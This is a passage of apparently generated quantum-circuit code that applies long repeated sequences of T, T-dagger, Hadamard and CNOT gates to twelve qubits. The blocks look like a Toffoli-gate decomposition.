k.gate('t',[10])
k.gate('cnot',[9,4])
k.gate('cnot',[10,9])
k.gate('cnot',[4,10])
k.gate('tdag',[9])
k.gate('cnot',[4,9])
k.gate('tdag',[4])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[4,10])
k.gate('cnot',[9,4])
k.gate('h',[10])
k.gate('h',[9])
k.gate('t',[3])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,3])
k.gate('cnot',[9,8])
k.gate('cnot',[3,9])
k.gate('tdag',[8])
k.gate('cnot',[3,8])
k.gate('tdag',[3])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[3,9])
k.gate('cnot',[8,3])
k.gate('h',[9])
k.gate('h',[8])
k.gate('t',[1])
k.gate('t',[2])
k.gate('t',[8])
k.gate('cnot',[2,1])
k.gate('cnot',[8,2])
k.gate('cnot',[1,8])
k.gate('tdag',[2])
k.gate('cnot',[1,2])
k.gate('tdag',[1])
k.gate('tdag',[2])
k.gate('t',[8])
k.gate('cnot',[8,2])
k.gate('cnot',[1,8])
k.gate('cnot',[2,1])
k.gate('h',[8])
k.gate('h',[9])
k.gate('t',[3])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,3])
k.gate('cnot',[9,8])
k.gate('cnot',[3,9])
k.gate('tdag',[8])
k.gate('cnot',[3,8])
k.gate('tdag',[3])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[3,9])
k.gate('cnot',[8,3])
k.gate('h',[9])
k.gate('h',[10])
k.gate('t',[4])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,4])
k.gate('cnot',[10,9])
k.gate('cnot',[4,10])
k.gate('tdag',[9])
k.gate('cnot',[4,9])
k.gate('tdag',[4])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[4,10])
k.gate('cnot',[9,4])
k.gate('h',[10])
k.gate('h',[4])
k.gate('t',[11])
k.gate('t',[10])
k.gate('t',[4])
k.gate('cnot',[10,11])
k.gate('cnot',[4,10])
k.gate('cnot',[11,4])
k.gate('tdag',[10])
k.gate('cnot',[11,10])
k.gate('tdag',[11])
k.gate('tdag',[10])
k.gate('t',[4])
k.gate('cnot',[4,10])
k.gate('cnot',[11,4])
k.gate('cnot',[10,11])
k.gate('h',[4])
k.gate('h',[10])
k.gate('t',[3])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,3])
k.gate('cnot',[10,9])
k.gate('cnot',[3,10])
k.gate('tdag',[9])
k.gate('cnot',[3,9])
k.gate('tdag',[3])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[3,10])
k.gate('cnot',[9,3])
k.gate('h',[10])
k.gate('h',[9])
k.gate('t',[1])
k.gate('t',[2])
k.gate('t',[9])
k.gate('cnot',[2,1])
k.gate('cnot',[9,2])
k.gate('cnot',[1,9])
k.gate('tdag',[2])
k.gate('cnot',[1,2])
k.gate('tdag',[1])
k.gate('tdag',[2])
k.gate('t',[9])
k.gate('cnot',[9,2])
k.gate('cnot',[1,9])
k.gate('cnot',[2,1])
k.gate('h',[9])
k.gate('h',[10])
k.gate('t',[3])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,3])
k.gate('cnot',[10,9])
k.gate('cnot',[3,10])
k.gate('tdag',[9])
k.gate('cnot',[3,9])
k.gate('tdag',[3])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[3,10])
k.gate('cnot',[9,3])
k.gate('h',[10])
k.gate('h',[4])
k.gate('t',[11])
k.gate('t',[10])
k.gate('t',[4])
k.gate('cnot',[10,11])
k.gate('cnot',[4,10])
k.gate('cnot',[11,4])
k.gate('tdag',[10])
k.gate('cnot',[11,10])
k.gate('tdag',[11])
k.gate('tdag',[10])
k.gate('t',[4])
k.gate('cnot',[4,10])
k.gate('cnot',[11,4])
k.gate('cnot',[10,11])
k.gate('h',[4])
k.gate('h',[10])
k.gate('t',[3])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,3])
k.gate('cnot',[10,9])
k.gate('cnot',[3,10])
k.gate('tdag',[9])
k.gate('cnot',[3,9])
k.gate('tdag',[3])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[3,10])
k.gate('cnot',[9,3])
k.gate('h',[10])
k.gate('h',[9])
k.gate('t',[1])
k.gate('t',[2])
k.gate('t',[9])
k.gate('cnot',[2,1])
k.gate('cnot',[9,2])
k.gate('cnot',[1,9])
k.gate('tdag',[2])
k.gate('cnot',[1,2])
k.gate('tdag',[1])
k.gate('tdag',[2])
k.gate('t',[9])
k.gate('cnot',[9,2])
k.gate('cnot',[1,9])
k.gate('cnot',[2,1])
k.gate('h',[9])
k.gate('h',[10])
k.gate('t',[3])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,3])
k.gate('cnot',[10,9])
k.gate('cnot',[3,10])
k.gate('tdag',[9])
k.gate('cnot',[3,9])
k.gate('tdag',[3])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[3,10])
k.gate('cnot',[9,3])
k.gate('h',[10])
k.gate('h',[3])
k.gate('t',[11])
k.gate('t',[10])
k.gate('t',[3])
k.gate('cnot',[10,11])
k.gate('cnot',[3,10])
k.gate('cnot',[11,3])
k.gate('tdag',[10])
k.gate('cnot',[11,10])
k.gate('tdag',[11])
k.gate('tdag',[10])
k.gate('t',[3])
k.gate('cnot',[3,10])
k.gate('cnot',[11,3])
k.gate('cnot',[10,11])
k.gate('h',[3])
k.gate('h',[10])
k.gate('t',[1])
k.gate('t',[2])
k.gate('t',[10])
k.gate('cnot',[2,1])
k.gate('cnot',[10,2])
k.gate('cnot',[1,10])
k.gate('tdag',[2])
k.gate('cnot',[1,2])
k.gate('tdag',[1])
k.gate('tdag',[2])
k.gate('t',[10])
k.gate('cnot',[10,2])
k.gate('cnot',[1,10])
k.gate('cnot',[2,1])
k.gate('h',[10])
k.gate('h',[3])
k.gate('t',[11])
k.gate('t',[10])
k.gate('t',[3])
k.gate('cnot',[10,11])
k.gate('cnot',[3,10])
k.gate('cnot',[11,3])
k.gate('tdag',[10])
k.gate('cnot',[11,10])
k.gate('tdag',[11])
k.gate('tdag',[10])
k.gate('t',[3])
k.gate('cnot',[3,10])
k.gate('cnot',[11,3])
k.gate('cnot',[10,11])
k.gate('h',[3])
k.gate('h',[10])
k.gate('t',[1])
k.gate('t',[2])
k.gate('t',[10])
k.gate('cnot',[2,1])
k.gate('cnot',[10,2])
k.gate('cnot',[1,10])
k.gate('tdag',[2])
k.gate('cnot',[1,2])
k.gate('tdag',[1])
k.gate('tdag',[2])
k.gate('t',[10])
k.gate('cnot',[10,2])
k.gate('cnot',[1,10])
k.gate('cnot',[2,1])
k.gate('h',[10])
k.gate('h',[2])
k.gate('t',[1])
k.gate('t',[11])
k.gate('t',[2])
k.gate('cnot',[11,1])
k.gate('cnot',[2,11])
k.gate('cnot',[1,2])
k.gate('tdag',[11])
k.gate('cnot',[1,11])
k.gate('tdag',[1])
k.gate('tdag',[11])
k.gate('t',[2])
k.gate('cnot',[2,11])
k.gate('cnot',[1,2])
k.gate('cnot',[11,1])
k.gate('h',[2])
k.gate('cnot',[11,1])
k.gate('h',[11])
k.gate('t',[4])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,4])
k.gate('cnot',[11,10])
k.gate('cnot',[4,11])
k.gate('tdag',[10])
k.gate('cnot',[4,10])
k.gate('tdag',[4])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[4,11])
k.gate('cnot',[10,4])
k.gate('h',[11])
k.gate('h',[10])
k.gate('t',[3])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,3])
k.gate('cnot',[10,9])
k.gate('cnot',[3,10])
k.gate('tdag',[9])
k.gate('cnot',[3,9])
k.gate('tdag',[3])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[3,10])
k.gate('cnot',[9,3])
k.gate('h',[10])
k.gate('h',[9])
k.gate('t',[2])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,2])
k.gate('cnot',[9,8])
k.gate('cnot',[2,9])
k.gate('tdag',[8])
k.gate('cnot',[2,8])
k.gate('tdag',[2])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[2,9])
k.gate('cnot',[8,2])
k.gate('h',[9])
k.gate('h',[8])
k.gate('t',[0])
k.gate('t',[1])
k.gate('t',[8])
k.gate('cnot',[1,0])
k.gate('cnot',[8,1])
k.gate('cnot',[0,8])
k.gate('tdag',[1])
k.gate('cnot',[0,1])
k.gate('tdag',[0])
k.gate('tdag',[1])
k.gate('t',[8])
k.gate('cnot',[8,1])
k.gate('cnot',[0,8])
k.gate('cnot',[1,0])
k.gate('h',[8])
k.gate('h',[9])
k.gate('t',[2])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,2])
k.gate('cnot',[9,8])
k.gate('cnot',[2,9])
k.gate('tdag',[8])
k.gate('cnot',[2,8])
k.gate('tdag',[2])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[2,9])
k.gate('cnot',[8,2])
k.gate('h',[9])
k.gate('h',[10])
k.gate('t',[3])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,3])
k.gate('cnot',[10,9])
k.gate('cnot',[3,10])
k.gate('tdag',[9])
k.gate('cnot',[3,9])
k.gate('tdag',[3])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[3,10])
k.gate('cnot',[9,3])
k.gate('h',[10])
k.gate('h',[11])
k.gate('t',[4])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,4])
k.gate('cnot',[11,10])
k.gate('cnot',[4,11])
k.gate('tdag',[10])
k.gate('cnot',[4,10])
k.gate('tdag',[4])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[4,11])
k.gate('cnot',[10,4])
k.gate('h',[11])
k.gate('h',[10])
k.gate('t',[3])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,3])
k.gate('cnot',[10,9])
k.gate('cnot',[3,10])
k.gate('tdag',[9])
k.gate('cnot',[3,9])
k.gate('tdag',[3])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[3,10])
k.gate('cnot',[9,3])
k.gate('h',[10])
k.gate('h',[9])
k.gate('t',[2])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,2])
k.gate('cnot',[9,8])
k.gate('cnot',[2,9])
k.gate('tdag',[8])
k.gate('cnot',[2,8])
k.gate('tdag',[2])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[2,9])
k.gate('cnot',[8,2])
k.gate('h',[9])
k.gate('h',[8])
k.gate('t',[0])
k.gate('t',[1])
k.gate('t',[8])
k.gate('cnot',[1,0])
k.gate('cnot',[8,1])
k.gate('cnot',[0,8])
k.gate('tdag',[1])
k.gate('cnot',[0,1])
k.gate('tdag',[0])
k.gate('tdag',[1])
k.gate('t',[8])
k.gate('cnot',[8,1])
k.gate('cnot',[0,8])
k.gate('cnot',[1,0])
k.gate('h',[8])
k.gate('h',[9])
k.gate('t',[2])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,2])
k.gate('cnot',[9,8])
k.gate('cnot',[2,9])
k.gate('tdag',[8])
k.gate('cnot',[2,8])
k.gate('tdag',[2])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[2,9])
k.gate('cnot',[8,2])
k.gate('h',[9])
k.gate('h',[10])
k.gate('t',[3])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,3])
k.gate('cnot',[10,9])
k.gate('cnot',[3,10])
k.gate('tdag',[9])
k.gate('cnot',[3,9])
k.gate('tdag',[3])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[3,10])
k.gate('cnot',[9,3])
k.gate('h',[10])
k.gate('h',[9])
k.gate('t',[11])
k.gate('t',[4])
k.gate('t',[9])
k.gate('cnot',[4,11])
k.gate('cnot',[9,4])
k.gate('cnot',[11,9])
k.gate('tdag',[4])
k.gate('cnot',[11,4])
k.gate('tdag',[11])
k.gate('tdag',[4])
k.gate('t',[9])
k.gate('cnot',[9,4])
k.gate('cnot',[11,9])
k.gate('cnot',[4,11])
k.gate('h',[9])
k.gate('h',[4])
k.gate('t',[10])
k.gate('t',[3])
k.gate('t',[4])
k.gate('cnot',[3,10])
k.gate('cnot',[4,3])
k.gate('cnot',[10,4])
k.gate('tdag',[3])
k.gate('cnot',[10,3])
k.gate('tdag',[10])
k.gate('tdag',[3])
k.gate('t',[4])
k.gate('cnot',[4,3])
k.gate('cnot',[10,4])
k.gate('cnot',[3,10])
k.gate('h',[4])
k.gate('h',[3])
k.gate('t',[8])
k.gate('t',[2])
k.gate('t',[3])
k.gate('cnot',[2,8])
k.gate('cnot',[3,2])
k.gate('cnot',[8,3])
k.gate('tdag',[2])
k.gate('cnot',[8,2])
k.gate('tdag',[8])
k.gate('tdag',[2])
k.gate('t',[3])
k.gate('cnot',[3,2])
k.gate('cnot',[8,3])
k.gate('cnot',[2,8])
k.gate('h',[3])
k.gate('h',[2])
k.gate('t',[7])
k.gate('t',[1])
k.gate('t',[2])
k.gate('cnot',[1,7])
k.gate('cnot',[2,1])
k.gate('cnot',[7,2])
k.gate('tdag',[1])
k.gate('cnot',[7,1])
k.gate('tdag',[7])
k.gate('tdag',[1])
k.gate('t',[2])
k.gate('cnot',[2,1])
k.gate('cnot',[7,2])
k.gate('cnot',[1,7])
k.gate('h',[2])
k.gate('h',[1])
k.gate('t',[5])
k.gate('t',[6])
k.gate('t',[1])
k.gate('cnot',[6,5])
k.gate('cnot',[1,6])
k.gate('cnot',[5,1])
k.gate('tdag',[6])
k.gate('cnot',[5,6])
k.gate('tdag',[5])
k.gate('tdag',[6])
k.gate('t',[1])
k.gate('cnot',[1,6])
k.gate('cnot',[5,1])
k.gate('cnot',[6,5])
k.gate('h',[1])
k.gate('h',[2])
k.gate('t',[7])
k.gate('t',[1])
k.gate('t',[2])
k.gate('cnot',[1,7])
k.gate('cnot',[2,1])
k.gate('cnot',[7,2])
k.gate('tdag',[1])
k.gate('cnot',[7,1])
k.gate('tdag',[7])
k.gate('tdag',[1])
k.gate('t',[2])
k.gate('cnot',[2,1])
k.gate('cnot',[7,2])
k.gate('cnot',[1,7])
k.gate('h',[2])
k.gate('h',[3])
k.gate('t',[8])
k.gate('t',[2])
k.gate('t',[3])
k.gate('cnot',[2,8])
k.gate('cnot',[3,2])
k.gate('cnot',[8,3])
k.gate('tdag',[2])
k.gate('cnot',[8,2])
k.gate('tdag',[8])
k.gate('tdag',[2])
k.gate('t',[3])
k.gate('cnot',[3,2])
k.gate('cnot',[8,3])
k.gate('cnot',[2,8])
k.gate('h',[3])
k.gate('h',[4])
k.gate('t',[10])
k.gate('t',[3])
k.gate('t',[4])
k.gate('cnot',[3,10])
k.gate('cnot',[4,3])
k.gate('cnot',[10,4])
k.gate('tdag',[3])
k.gate('cnot',[10,3])
k.gate('tdag',[10])
k.gate('tdag',[3])
k.gate('t',[4])
k.gate('cnot',[4,3])
k.gate('cnot',[10,4])
k.gate('cnot',[3,10])
k.gate('h',[4])
k.gate('h',[9])
k.gate('t',[11])
k.gate('t',[4])
k.gate('t',[9])
k.gate('cnot',[4,11])
k.gate('cnot',[9,4])
k.gate('cnot',[11,9])
k.gate('tdag',[4])
k.gate('cnot',[11,4])
k.gate('tdag',[11])
k.gate('tdag',[4])
k.gate('t',[9])
k.gate('cnot',[9,4])
k.gate('cnot',[11,9])
k.gate('cnot',[4,11])
k.gate('h',[9])
k.gate('h',[4])
k.gate('t',[10])
k.gate('t',[3])
k.gate('t',[4])
k.gate('cnot',[3,10])
k.gate('cnot',[4,3])
k.gate('cnot',[10,4])
k.gate('tdag',[3])
k.gate('cnot',[10,3])
k.gate('tdag',[10])
k.gate('tdag',[3])
k.gate('t',[4])
k.gate('cnot',[4,3])
k.gate('cnot',[10,4])
k.gate('cnot',[3,10])
k.gate('h',[4])
k.gate('h',[3])
k.gate('t',[8])
k.gate('t',[2])
k.gate('t',[3])
k.gate('cnot',[2,8])
k.gate('cnot',[3,2])
k.gate('cnot',[8,3])
k.gate('tdag',[2])
k.gate('cnot',[8,2])
k.gate('tdag',[8])
k.gate('tdag',[2])
k.gate('t',[3])
k.gate('cnot',[3,2])
k.gate('cnot',[8,3])
k.gate('cnot',[2,8])
k.gate('h',[3])
k.gate('h',[2])
k.gate('t',[7])
k.gate('t',[1])
k.gate('t',[2])
k.gate('cnot',[1,7])
k.gate('cnot',[2,1])
k.gate('cnot',[7,2])
k.gate('tdag',[1])
k.gate('cnot',[7,1])
k.gate('tdag',[7])
k.gate('tdag',[1])
k.gate('t',[2])
k.gate('cnot',[2,1])
k.gate('cnot',[7,2])
k.gate('cnot',[1,7])
k.gate('h',[2])
k.gate('h',[1])
k.gate('t',[5])
k.gate('t',[6])
k.gate('t',[1])
k.gate('cnot',[6,5])
k.gate('cnot',[1,6])
k.gate('cnot',[5,1])
k.gate('tdag',[6])
k.gate('cnot',[5,6])
k.gate('tdag',[5])
k.gate('tdag',[6])
k.gate('t',[1])
k.gate('cnot',[1,6])
k.gate('cnot',[5,1])
k.gate('cnot',[6,5])
k.gate('h',[1])
k.gate('h',[2])
k.gate('t',[7])
k.gate('t',[1])
k.gate('t',[2])
k.gate('cnot',[1,7])
k.gate('cnot',[2,1])
k.gate('cnot',[7,2])
k.gate('tdag',[1])
k.gate('cnot',[7,1])
k.gate('tdag',[7])
k.gate('tdag',[1])
k.gate('t',[2])
k.gate('cnot',[2,1])
k.gate('cnot',[7,2])
k.gate('cnot',[1,7])
k.gate('h',[2])
k.gate('h',[3])
k.gate('t',[8])
k.gate('t',[2])
k.gate('t',[3])
k.gate('cnot',[2,8])
k.gate('cnot',[3,2])
k.gate('cnot',[8,3])
k.gate('tdag',[2])
k.gate('cnot',[8,2])
k.gate('tdag',[8])
k.gate('tdag',[2])
k.gate('t',[3])
k.gate('cnot',[3,2])
k.gate('cnot',[8,3])
k.gate('cnot',[2,8])
k.gate('h',[3])
k.gate('h',[4])
k.gate('t',[10])
k.gate('t',[3])
k.gate('t',[4])
k.gate('cnot',[3,10])
k.gate('cnot',[4,3])
k.gate('cnot',[10,4])
k.gate('tdag',[3])
k.gate('cnot',[10,3])
k.gate('tdag',[10])
k.gate('tdag',[3])
k.gate('t',[4])
k.gate('cnot',[4,3])
k.gate('cnot',[10,4])
k.gate('cnot',[3,10])
k.gate('h',[4])
k.gate('h',[11])
k.gate('t',[4])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,4])
k.gate('cnot',[11,10])
k.gate('cnot',[4,11])
k.gate('tdag',[10])
k.gate('cnot',[4,10])
k.gate('tdag',[4])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[4,11])
k.gate('cnot',[10,4])
k.gate('h',[11])
k.gate('h',[10])
k.gate('t',[3])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,3])
k.gate('cnot',[10,9])
k.gate('cnot',[3,10])
k.gate('tdag',[9])
k.gate('cnot',[3,9])
k.gate('tdag',[3])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[3,10])
k.gate('cnot',[9,3])
k.gate('h',[10])
k.gate('h',[9])
k.gate('t',[2])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,2])
k.gate('cnot',[9,8])
k.gate('cnot',[2,9])
k.gate('tdag',[8])
k.gate('cnot',[2,8])
k.gate('tdag',[2])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[2,9])
k.gate('cnot',[8,2])
k.gate('h',[9])
k.gate('h',[8])
k.gate('t',[0])
k.gate('t',[1])
k.gate('t',[8])
k.gate('cnot',[1,0])
k.gate('cnot',[8,1])
k.gate('cnot',[0,8])
k.gate('tdag',[1])
k.gate('cnot',[0,1])
k.gate('tdag',[0])
k.gate('tdag',[1])
k.gate('t',[8])
k.gate('cnot',[8,1])
k.gate('cnot',[0,8])
k.gate('cnot',[1,0])
k.gate('h',[8])
k.gate('h',[9])
k.gate('t',[2])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,2])
k.gate('cnot',[9,8])
k.gate('cnot',[2,9])
k.gate('tdag',[8])
k.gate('cnot',[2,8])
k.gate('tdag',[2])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[2,9])
k.gate('cnot',[8,2])
k.gate('h',[9])
k.gate('h',[10])
k.gate('t',[3])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,3])
k.gate('cnot',[10,9])
k.gate('cnot',[3,10])
k.gate('tdag',[9])
k.gate('cnot',[3,9])
k.gate('tdag',[3])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[3,10])
k.gate('cnot',[9,3])
k.gate('h',[10])
k.gate('h',[11])
k.gate('t',[4])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,4])
k.gate('cnot',[11,10])
k.gate('cnot',[4,11])
k.gate('tdag',[10])
k.gate('cnot',[4,10])
k.gate('tdag',[4])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[4,11])
k.gate('cnot',[10,4])
k.gate('h',[11])
k.gate('h',[10])
k.gate('t',[3])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,3])
k.gate('cnot',[10,9])
k.gate('cnot',[3,10])
k.gate('tdag',[9])
k.gate('cnot',[3,9])
k.gate('tdag',[3])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[3,10])
k.gate('cnot',[9,3])
k.gate('h',[10])
k.gate('h',[9])
k.gate('t',[2])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,2])
k.gate('cnot',[9,8])
k.gate('cnot',[2,9])
k.gate('tdag',[8])
k.gate('cnot',[2,8])
k.gate('tdag',[2])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[2,9])
k.gate('cnot',[8,2])
k.gate('h',[9])
k.gate('h',[8])
k.gate('t',[0])
k.gate('t',[1])
k.gate('t',[8])
k.gate('cnot',[1,0])
k.gate('cnot',[8,1])
k.gate('cnot',[0,8])
k.gate('tdag',[1])
k.gate('cnot',[0,1])
k.gate('tdag',[0])
k.gate('tdag',[1])
k.gate('t',[8])
k.gate('cnot',[8,1])
k.gate('cnot',[0,8])
k.gate('cnot',[1,0])
k.gate('h',[8])
k.gate('h',[9])
k.gate('t',[2])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,2])
k.gate('cnot',[9,8])
k.gate('cnot',[2,9])
k.gate('tdag',[8])
k.gate('cnot',[2,8])
k.gate('tdag',[2])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[2,9])
k.gate('cnot',[8,2])
k.gate('h',[9])
k.gate('h',[10])
k.gate('t',[3])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,3])
k.gate('cnot',[10,9])
k.gate('cnot',[3,10])
k.gate('tdag',[9])
k.gate('cnot',[3,9])
k.gate('tdag',[3])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[3,10])
k.gate('cnot',[9,3])
k.gate('h',[10])
k.gate('h',[9])
k.gate('t',[11])
k.gate('t',[4])
k.gate('t',[9])
k.gate('cnot',[4,11])
k.gate('cnot',[9,4])
k.gate('cnot',[11,9])
k.gate('tdag',[4])
k.gate('cnot',[11,4])
k.gate('tdag',[11])
k.gate('tdag',[4])
k.gate('t',[9])
k.gate('cnot',[9,4])
k.gate('cnot',[11,9])
k.gate('cnot',[4,11])
k.gate('h',[9])
k.gate('h',[4])
k.gate('t',[10])
k.gate('t',[3])
k.gate('t',[4])
k.gate('cnot',[3,10])
k.gate('cnot',[4,3])
k.gate('cnot',[10,4])
k.gate('tdag',[3])
k.gate('cnot',[10,3])
k.gate('tdag',[10])
k.gate('tdag',[3])
k.gate('t',[4])
k.gate('cnot',[4,3])
k.gate('cnot',[10,4])
k.gate('cnot',[3,10])
k.gate('h',[4])
k.gate('h',[3])
k.gate('t',[8])
k.gate('t',[2])
k.gate('t',[3])
k.gate('cnot',[2,8])
k.gate('cnot',[3,2])
k.gate('cnot',[8,3])
k.gate('tdag',[2])
k.gate('cnot',[8,2])
k.gate('tdag',[8])
k.gate('tdag',[2])
k.gate('t',[3])
k.gate('cnot',[3,2])
k.gate('cnot',[8,3])
k.gate('cnot',[2,8])
k.gate('h',[3])
k.gate('h',[2])
k.gate('t',[7])
k.gate('t',[1])
k.gate('t',[2])
k.gate('cnot',[1,7])
k.gate('cnot',[2,1])
k.gate('cnot',[7,2])
k.gate('tdag',[1])
k.gate('cnot',[7,1])
k.gate('tdag',[7])
k.gate('tdag',[1])
k.gate('t',[2])
k.gate('cnot',[2,1])
k.gate('cnot',[7,2])
k.gate('cnot',[1,7])
k.gate('h',[2])
k.gate('h',[1])
k.gate('t',[5])
k.gate('t',[6])
k.gate('t',[1])
k.gate('cnot',[6,5])
k.gate('cnot',[1,6])
k.gate('cnot',[5,1])
k.gate('tdag',[6])
k.gate('cnot',[5,6])
k.gate('tdag',[5])
k.gate('tdag',[6])
k.gate('t',[1])
k.gate('cnot',[1,6])
k.gate('cnot',[5,1])
k.gate('cnot',[6,5])
k.gate('h',[1])
k.gate('h',[2])
k.gate('t',[7])
k.gate('t',[1])
k.gate('t',[2])
k.gate('cnot',[1,7])
k.gate('cnot',[2,1])
k.gate('cnot',[7,2])
k.gate('tdag',[1])
k.gate('cnot',[7,1])
k.gate('tdag',[7])
k.gate('tdag',[1])
k.gate('t',[2])
k.gate('cnot',[2,1])
k.gate('cnot',[7,2])
k.gate('cnot',[1,7])
k.gate('h',[2])
k.gate('h',[3])
k.gate('t',[8])
k.gate('t',[2])
k.gate('t',[3])
k.gate('cnot',[2,8])
k.gate('cnot',[3,2])
k.gate('cnot',[8,3])
k.gate('tdag',[2])
k.gate('cnot',[8,2])
k.gate('tdag',[8])
k.gate('tdag',[2])
k.gate('t',[3])
k.gate('cnot',[3,2])
k.gate('cnot',[8,3])
k.gate('cnot',[2,8])
k.gate('h',[3])
k.gate('h',[4])
k.gate('t',[10])
k.gate('t',[3])
k.gate('t',[4])
k.gate('cnot',[3,10])
k.gate('cnot',[4,3])
k.gate('cnot',[10,4])
k.gate('tdag',[3])
k.gate('cnot',[10,3])
k.gate('tdag',[10])
k.gate('tdag',[3])
k.gate('t',[4])
k.gate('cnot',[4,3])
k.gate('cnot',[10,4])
k.gate('cnot',[3,10])
k.gate('h',[4])
k.gate('h',[9])
k.gate('t',[11])
k.gate('t',[4])
k.gate('t',[9])
k.gate('cnot',[4,11])
k.gate('cnot',[9,4])
k.gate('cnot',[11,9])
k.gate('tdag',[4])
k.gate('cnot',[11,4])
k.gate('tdag',[11])
k.gate('tdag',[4])
k.gate('t',[9])
k.gate('cnot',[9,4])
k.gate('cnot',[11,9])
k.gate('cnot',[4,11])
k.gate('h',[9])
k.gate('h',[4])
k.gate('t',[10])
k.gate('t',[3])
k.gate('t',[4])
k.gate('cnot',[3,10])
k.gate('cnot',[4,3])
k.gate('cnot',[10,4])
k.gate('tdag',[3])
k.gate('cnot',[10,3])
k.gate('tdag',[10])
k.gate('tdag',[3])
k.gate('t',[4])
k.gate('cnot',[4,3])
k.gate('cnot',[10,4])
k.gate('cnot',[3,10])
k.gate('h',[4])
k.gate('h',[3])
k.gate('t',[8])
k.gate('t',[2])
k.gate('t',[3])
k.gate('cnot',[2,8])
k.gate('cnot',[3,2])
k.gate('cnot',[8,3])
k.gate('tdag',[2])
k.gate('cnot',[8,2])
k.gate('tdag',[8])
k.gate('tdag',[2])
k.gate('t',[3])
k.gate('cnot',[3,2])
k.gate('cnot',[8,3])
k.gate('cnot',[2,8])
k.gate('h',[3])
k.gate('h',[2])
k.gate('t',[7])
k.gate('t',[1])
k.gate('t',[2])
k.gate('cnot',[1,7])
k.gate('cnot',[2,1])
k.gate('cnot',[7,2])
k.gate('tdag',[1])
k.gate('cnot',[7,1])
k.gate('tdag',[7])
k.gate('tdag',[1])
k.gate('t',[2])
k.gate('cnot',[2,1])
k.gate('cnot',[7,2])
k.gate('cnot',[1,7])
k.gate('h',[2])
k.gate('h',[1])
k.gate('t',[5])
k.gate('t',[6])
k.gate('t',[1])
k.gate('cnot',[6,5])
k.gate('cnot',[1,6])
k.gate('cnot',[5,1])
k.gate('tdag',[6])
k.gate('cnot',[5,6])
k.gate('tdag',[5])
k.gate('tdag',[6])
k.gate('t',[1])
k.gate('cnot',[1,6])
k.gate('cnot',[5,1])
k.gate('cnot',[6,5])
k.gate('h',[1])
k.gate('h',[2])
k.gate('t',[7])
k.gate('t',[1])
k.gate('t',[2])
k.gate('cnot',[1,7])
k.gate('cnot',[2,1])
k.gate('cnot',[7,2])
k.gate('tdag',[1])
